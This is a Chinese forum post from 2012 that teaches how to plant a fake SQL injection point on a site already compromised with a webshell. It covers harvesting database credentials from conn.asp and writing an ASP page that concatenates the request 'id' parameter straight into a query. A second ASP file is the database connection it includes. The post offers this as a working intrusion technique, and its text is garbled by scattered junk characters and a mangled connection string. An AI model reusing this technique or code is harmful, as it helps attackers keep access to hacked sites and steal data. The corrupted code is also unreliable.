首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:& O) d$ h0 U1 Y& M& N: G
ASP/Visual Basic代码) B4 l6 L/ {. B3 B( F8 H6 d
<!--#include file="xx.asp"-->
9 U; q3 s) e6 d% U; s X<%
3 B1 ^$ Z3 H, L; hset rs=server.createobject("ADODB.recordset") j' F1 R" l/ c0 V
id = request("id")
) x7 V) I u* N; T" `+ [: X0 ZstrSQL = "select * from admin where id=" & id ( h: z8 d w3 I
rs.open strSQL,conn,1,3
# @. x4 D% a; g: g9 Trs.close $ @3 T8 v# s1 m8 S# S2 h) g
%>
0 o' d: o" \* R: S* q8 w9 X把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
2 S4 E' |# d4 [( Z! a+ }9 u然后就要构造一个连接数据库的文件了,代码如下:2 Q6 v# X% b6 U5 F0 T
ASP/Visual Basic代码
; u/ R) x; ]& E% Y<% 4 ~0 X. ^7 c$ m5 Z6 G$ Y$ Q S
strSQLServerName = "000.000.000.000" '服务器名称或地址
4 U- R% t$ c8 g9 NstrSQLDBUserName = "sqlname" '数据库帐号
. C5 X9 ^5 K" PstrSQLDBPassword = "sqlpass" '数据库密码 ; H+ b5 l- D4 E5 [4 B& ~# B, R
strSQLDBName = "sqldataname" '数据库名称 {& F5 |6 u' P& X& j
Set conn = Server.CreateObject("ADODB.Connection") " B6 D2 b' ?5 Y7 t
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
, {* |( ?5 Z& a' K9 fconn.open strCon & R9 a2 E( ` y& }1 E
%> ) o8 I x% u2 ~+ W/ B
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功7 u4 l, r' M: b$ e; S0 T
|
发表于 2012-9-13 17:53:08
收藏
支持
反对